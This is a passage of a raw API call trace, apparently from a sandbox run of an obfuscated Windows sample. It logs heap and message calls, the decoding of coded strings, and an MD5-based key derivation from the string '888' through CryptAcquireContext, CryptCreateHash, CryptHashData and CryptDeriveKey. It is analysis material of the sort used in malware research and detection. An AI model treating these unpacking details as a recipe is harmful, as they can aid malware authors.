| out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.079] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0155.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.079] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0155.080] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0155.080] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.080] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0155.080] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.080] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0155.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0155.081] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0155.081] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.081] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0155.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0155.081] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.081] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.081] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.081] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0155.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0155.081] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.081] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.081] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0155.081] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.081] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0155.081] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0155.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0155.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0155.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0155.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0155.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7100, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0155.082] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be890) returned 1 [0155.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.083] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0155.083] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.083] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0155.083] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.083] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0155.083] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.083] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0155.083] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.083] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.083] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0155.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.084] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0155.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.084] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0155.084] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0155.084] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0155.084] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0155.084] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0155.084] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0155.084] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0155.084] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0155.084] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0155.084] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0155.084] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0155.084] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0155.085] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.085] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.085] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.085] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.085] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.085] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0155.085] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.085] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0155.085] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0155.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0155.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaad80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0155.085] CryptCreateHash (in: hProv=0x9be890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0155.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0155.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0155.086] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0155.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0155.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0155.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.086] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.086] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.086] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.086] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.086] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0155.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0155.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaadb0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0155.086] CryptHashData (hHash=0x9e1c38, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0155.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.086] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.086] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.086] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.086] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.087] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0155.087] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.087] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0155.087] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0155.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0155.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 